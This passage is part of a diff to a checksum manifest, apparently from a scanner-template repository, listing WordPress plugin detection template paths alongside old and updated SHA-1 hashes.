-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:244cdac044bd69c37705df62fa8539c0afc56e81 -http/technologies/wordpress/plugins/gtranslate.yaml:300e7e999e690706f13647cf66a3553f8bbd9eda -http/technologies/wordpress/plugins/gutenberg.yaml:32f1b428ac452f49894a8695647f6b1e7c631499 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:ac31fde196a6e4bc9b564b69a62146394e6665bc +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:c64112a2a3423112f22659daf2845f7394e57725 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:fcb6316047b3cb92d6a79b6b3cd0bc5ec7410d8f +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:3a6a408c680afed419fd5cff87843d842fb53175 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:2f93216319633715b88eadfeb45c0e4f0fc1a9e7 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:db9313e5c1ba6ee717bdcaf28ca5bf4aef6282f4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:4d1d6f45a8bfb7e29348c90b10ff3f2d62aa139d -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b7430d2640dbf737342cbe7cca37a4ef03a4aa0c -http/technologies/wordpress/plugins/header-footer.yaml:e0271c6f2279c63f745469e284af4a4c873e4e32 -http/technologies/wordpress/plugins/health-check.yaml:8533f7c8db62b337cf3f71f07fd4c41fe50802b5 -http/technologies/wordpress/plugins/hello-dolly.yaml:d9053f90244463f1cbde96a169d0c991aa4a90d0 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:51f0191e0c8155a80a8ab37ba35a3c0a0cacc296 -http/technologies/wordpress/plugins/hostinger.yaml:d0a0e3dd49a5a90cd8a7da15bf0a9ace4c1c98a4 -http/technologies/wordpress/plugins/imagify.yaml:faa8b78002971d2bb1d95cd737dbadc6c4daad94 -http/technologies/wordpress/plugins/imsanity.yaml:fff799cd8ae3b953327c509ae061b46fa8d4fec1 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:973519730ef8e52fe6eb15ebecf244c7662ff3c1 -http/technologies/wordpress/plugins/instagram-feed.yaml:ee3b5f2e4a849ddea037e996a16f8b40b5156bc8 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:1f38bd18ba2b82616ad81492a81c61bd8b2ddc87 -http/technologies/wordpress/plugins/iwp-client.yaml:f26c491a757f8b5bbf25a7345415d97faa501fda -http/technologies/wordpress/plugins/jetpack-boost.yaml:cc76eba35b9bae7bbed9d09d90cc2b6d231f4f09 -http/technologies/wordpress/plugins/jetpack.yaml:e268a4cd95490dfc78d7f9a59b41a1d803387765 -http/technologies/wordpress/plugins/kadence-blocks.yaml:8bfb4614a06c6899e918b697971bbd436e82ff7a -http/technologies/wordpress/plugins/kirki.yaml:f6f7f3e62b4fb921bd08e3e6bd6bb3446bd44e8f -http/technologies/wordpress/plugins/leadin.yaml:7545899a7f811434f57d9f89d3bd968cf1752807 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:52866133a5adf6cf4c2a348ff095ef5b9caa5348 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:efcf8d73a9f5e344f9fbd223b34089699674cbab -http/technologies/wordpress/plugins/litespeed-cache.yaml:1e63df275c7d04c9aa90d94328393b7607d9372a -http/technologies/wordpress/plugins/loco-translate.yaml:bc45ae1d763f52aa0367f1b3f95a6e9f978c37c0 -http/technologies/wordpress/plugins/loginizer.yaml:31a3a911cf3ff78c34be0b1b9d04beba3320a1a4 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/hostinger.yaml:5528d42fea5183ffda7073d1c116da79afb63cf3 +http/technologies/wordpress/plugins/image-optimization.yaml:fd00671fcb1a927454714d707e89e62b40f6a329 +http/technologies/wordpress/plugins/imagify.yaml:b82e202b7774603cc5dfc671f09e78399cd6a82b +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:e2398e4c0e2ea31019da3715d6aed35ccc0f6729 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:be5174a80ec6c119a05428acdc1218fac85a6795 +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:ac07eddd9c24c454da110aeed229bb2b28d70455 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:9b6db5c3f12492ccf4891d747e305f024b5c14f0 -http/technologies/wordpress/plugins/mailpoet.yaml:c97dc7f04572c3dbf7ceb7e50401211b5599c818 -http/technologies/wordpress/plugins/maintenance.yaml:295f0fd2ffe1f7ea22ab76b8d18f3ee35092cd96 -http/technologies/wordpress/plugins/mainwp-child.yaml:b688cc438d89c2749b26d4f8f8cb45ec17d7699a -http/technologies/wordpress/plugins/malcare-security.yaml:b54b8fd83dd949cab6002c5331c079d75c1fc3f4 -http/technologies/wordpress/plugins/megamenu.yaml:c8423d7a809554330f547331987fa37058bd4feb -http/technologies/wordpress/plugins/members.yaml:4140fcb3798791e357da256893d17b0a238e428b -http/technologies/wordpress/plugins/meta-box.yaml:dbb7305d0cc5ef83bdfa8e2ece7c6c9061ef91e4 -http/technologies/wordpress/plugins/metform.yaml:65634fd6728ca4bc85ca80c0ac362f417da0ad9d -http/technologies/wordpress/plugins/ml-slider.yaml:430354a9a5553d647624ba33db17768311d07523 -http/technologies/wordpress/plugins/newsletter.yaml:2a54c10c1adb7f1fe10f1cf41febea77a8c54201 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:cd1913fac3d9daf1668fedbaa1e70eba406a2d22 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:0870d994d70918f4c1b0848a857d2889558dc84e -http/technologies/wordpress/plugins/ninja-forms.yaml:12a251c4b537f8986af9a2880b5b5471e4296939 -http/technologies/wordpress/plugins/ocean-extra.yaml:22422896bbe38742e75f6ad3d1eb40c1e926860b -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:3630659fd7a97e3923d9523461ef946cf90189aa -http/technologies/wordpress/plugins/one-click-demo-import.yaml:d8a39e6b0864e80ce27a55787a787f75fbfda1f6 -http/technologies/wordpress/plugins/optinmonster.yaml:3364c9bedd3732e423d875e0b794dae7f1cda39a -http/technologies/wordpress/plugins/otter-blocks.yaml:0de8b7dd6fd72168854762aadb3bed5379a021d7 -http/technologies/wordpress/plugins/password-protected.yaml:e80f8e49adad96d6bdde8ace25f83d46f4233890 -http/technologies/wordpress/plugins/pdf-embedder.yaml:1189163750bdf0cbd90bcd482d6db8269938c151 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:80de34e84d55586e5eda37d00d277aad7f4b2451 +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/metform.yaml:aaa8b95a995e3345112a288f66e705b150968e7e +http/technologies/wordpress/plugins/ml-slider.yaml:104ad761a31985f8f0947e3e0b9bf872fe1f2c2a +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:f00d03dc0f365956376cec268c45bd669729260e +http/technologies/wordpress/plugins/ninja-forms.yaml:cc29026bcd3c62478d5147fd80a8b3a560bfe728 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 +http/technologies/wordpress/plugins/password-protected.yaml:b990fff1f3337e512694df82458fcf4d4f50c85c +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:b85e2341297c5486c33a1b3cba101af0870dade4 -http/technologies/wordpress/plugins/pixelyoursite.yaml:86774f138d729aec9a647bd97f06f3d6991753de -http/technologies/wordpress/plugins/polylang.yaml:86da9cc5ccefe6e33fd7268c4d79322127b8cc9f +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 +http/technologies/wordpress/plugins/pixelyoursite.yaml:ba9797f8208c7c3ed5cb45048764d8ecd0a62835 +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:c586ceff92cc0951588585ef0d2c045b7947d03c -http/technologies/wordpress/plugins/post-smtp.yaml:ada8074aabfd2462fbd5cd21aca173f808063f1d -http/technologies/wordpress/plugins/post-types-order.yaml:b4ed31ba98f47669b969a918e3268434e37731a8 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:9797329da820e41b9c21aff0db1e103940e701d9 -http/technologies/wordpress/plugins/pretty-link.yaml:5214523db1210ad2c9b67bf25027c678b98ecb62 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f41c89dc1aad86369582715c2578731e48800fa6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:73f999da9fa04feeb1d20a8093e4de25a34961d4 -http/technologies/wordpress/plugins/redirection.yaml:8dafb316d8e84d1cda6036443053ea7528e6a1f1 -http/technologies/wordpress/plugins/redux-framework.yaml:356588f5784084b238b92254f38e4d9db1c93e31 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:6f2db3e79bf45d485d9309bea46d652684cd4ff0 -http/technologies/wordpress/plugins/safe-svg.yaml:fc8b074bf380c14bcf3add2f851df13d61d0b051 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3b0bfdc4675829a4826c93ed761cf5a617a8448f -http/technologies/wordpress/plugins/sg-cachepress.yaml:00dff2fefaa54926c631ed50a7b39f1b16abcd75 -http/technologies/wordpress/plugins/sg-security.yaml:0f2e7acc0ba1d777d93595fbf69f82f56b990bc9 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:ecb8749a00582f73d7de99c662b7adb570444224 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a16dac9440ba1ef5bfbc6309df57cd9c955c41b9 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:2b8c7fefe669f47cdc2003120425b51ad3b8771f +http/technologies/wordpress/plugins/popup-maker.yaml:0838742608b1265516017095ccd495332e6a5991 +http/technologies/wordpress/plugins/post-smtp.yaml:754dd57d96b6f4456c570c7034a2ddf3056539f4 +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:195ac372f24aa1feb8c48fba65a97149f05e137f +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:9f6476b40090f693001f2da81075d5b3e650c2e3 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:d3871c6333178618d88df609d41ea9e626c1e312 +http/technologies/wordpress/plugins/sg-cachepress.yaml:557b4e350cd47eafc012c39dad25d48d6b397de0 +http/technologies/wordpress/plugins/sg-security.yaml:4d092558c2718bd98454bbec4adf942903cec393 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/simple-history.yaml:8441cfcd6437b914c70f78136d76cdeb85e261a0 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:481872a506d572939bba153191a93c71710eb7ca -http/technologies/wordpress/plugins/siteorigin-panels.yaml:6ee35e995741570641064d34d7ad53d44b6d7d4f -http/technologies/wordpress/plugins/smart-slider-3.yaml:312f28b3dafe0c10ab7489023928117626cc6b39 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:0b91311eb18209c5b83d33f5dbd25d4c1db79ef2 +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f3961e9e08694816f33e638acf1af19b4262a840 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:27296172cb0b189c5f848e712a8d9d23d553fda4 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:917d9c401e6ad38b35f257301604542715b1e9ee -http/technologies/wordpress/plugins/svg-support.yaml:3a822807890c3054a79535ef712ec9609f322dd3 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:156f30e8057192ed5a05f826778cebc72e1fc28f -http/technologies/wordpress/plugins/tablepress.yaml:16de19ddc054155760633553cbb238ef16539868 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:c0c9fe624c310657ea9794dbd28e29ca031d6b2d -http/technologies/wordpress/plugins/templately.yaml:a33565c457728af69ba60074b5cde9613366ed8f -http/technologies/wordpress/plugins/the-events-calendar.yaml:9c0627c042a03227384b037e4b7268e0baaa79a0 +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:9edb30d645fe661041ea30371023297ba0f84558 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/templately.yaml:c38b29f2acd823339a5f6e47b6da7d81815bf75b +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:11c99d26fe58a6b39c02e021d9f11ae4598cd2a2 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:b53b579dd2ce93ba3cd7fbae0dff6fc32c8399d0 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:a2fec59e3540c9e2dfe79233c284c88100a2b5f7 -http/technologies/wordpress/plugins/under-construction-page.yaml:93ae356287d60e4f428462aa15951d83c037007c +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:5fc184d6e1eb819dc98519af81c48502b499de9a +http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:944cbe82be113b0048c6a2c0339890a96f2198e0 +http/technologies/wordpress/plugins/updraftplus.yaml:0869ebd3a5621b5613665f63be4e3bdb52d4f58e http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:3ce78150c3281396322bc58130da28a7a7a4afe5 +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:6be690dd0cb4601177f085e511b03313330f12bc -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:0939b689e3d9ec52dc21fa790ae53e6e17c9e2f6 -http/technologies/wordpress/plugins/webp-express.yaml:eb5bee3d2f59088ecb5e73101836198317260a5b -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:2418f03105ec6bb36973342837a2b4dbe5563da2 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:880ad1faca113c3f05566870c22dd2b59bc5091c -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:38e45184e3cf1457bc267cb2961ac806bedc843f -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:0f0c4bebea283016770ad34c1964a0da9b45ba0b +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:c83318137ff90d44042f3ed16f10125651ca1922 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:362332c42aad7ae97162981502d91e9cc1b31066 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:4eeba712e493eab3d63cf0fb3beafa6ff108353e -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:57ee5a1fa924da779d1e04a9d77f3f88fc9f23b0 -http/technologies/wordpress/plugins/woocommerce-services.yaml:ac7a1e2d6b380a2ab24bfe67c251938a673393d8 -http/technologies/wordpress/plugins/woocommerce.yaml:f6d87b7b27c5fa71b3c4ec60521f11a281837852 -http/technologies/wordpress/plugins/wordfence.yaml:8a1102549cd71b4b14b430b48aa9e784dd54d293 -http/technologies/wordpress/plugins/wordpress-importer.yaml:c32ef48cc1a68c202959ed6006ae113c305f2360 -http/technologies/wordpress/plugins/wordpress-seo.yaml:c488db95fe62856ea59d9d3ff53212e03ec78403 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:961b2182decfa0e47bddb3a9435229fb28c9c7d3 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3e379163d373241c2e7a2ad497824f95689ee220 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:3051dd757235ca95fb746fb94da86e3837aa0397 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:27bd8f00c5bd9f7f4947653328df227564609f16 -http/technologies/wordpress/plugins/wp-file-manager.yaml:74bd4cd567141a6587d5a1052481ed5f55e6f9b5 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f94f28671675c72428828ac7b9aa67f06dcec8eb -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:ebb17b99050a72882caacf46068c623a56778210 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:fec11efb8562ef59f61e3b41bc2fd6959d1e5057 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:df5cfa9987cf4ebaa38f5a5d8e27d67fa5071193 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:a78aab3f7afe26cc3501415e34994750ba85b5f6 -http/technologies/wordpress/plugins/wp-optimize.yaml:f373d5c9a80ae37fd6073e2c9ef4f4c17eccddd2 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:ba7f6b79ce581d2ed727f5d0857bb202c243eb1b -http/technologies/wordpress/plugins/wp-reset.yaml:c513daf6e87b03bc6344ce928122dae936af680a -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:f6c32bb1722c4f48a4b93dfd75a6b2c9e971cc86 -http/technologies/wordpress/plugins/wp-rollback.yaml:ef5081f0518711abbcbb9b9460651e1e4aaa89e6 -http/technologies/wordpress/plugins/wp-seopress.yaml:bf7fd7fb7a30431ff5f6cd4c79eafa65ce85ab93 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:003cb3ed16906cc9210ffc52e66afbf5dfe888bb -http/technologies/wordpress/plugins/wp-smushit.yaml:e2cb3fe405ba2edeca55b554233ebf1ead8235af -http/technologies/wordpress/plugins/wp-statistics.yaml:233986adbbaaad4ca243dba486bc1e3514314c80 -http/technologies/wordpress/plugins/wp-super-cache.yaml:abafebbd1567e673bc3567b1876666e2f4970ae3 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 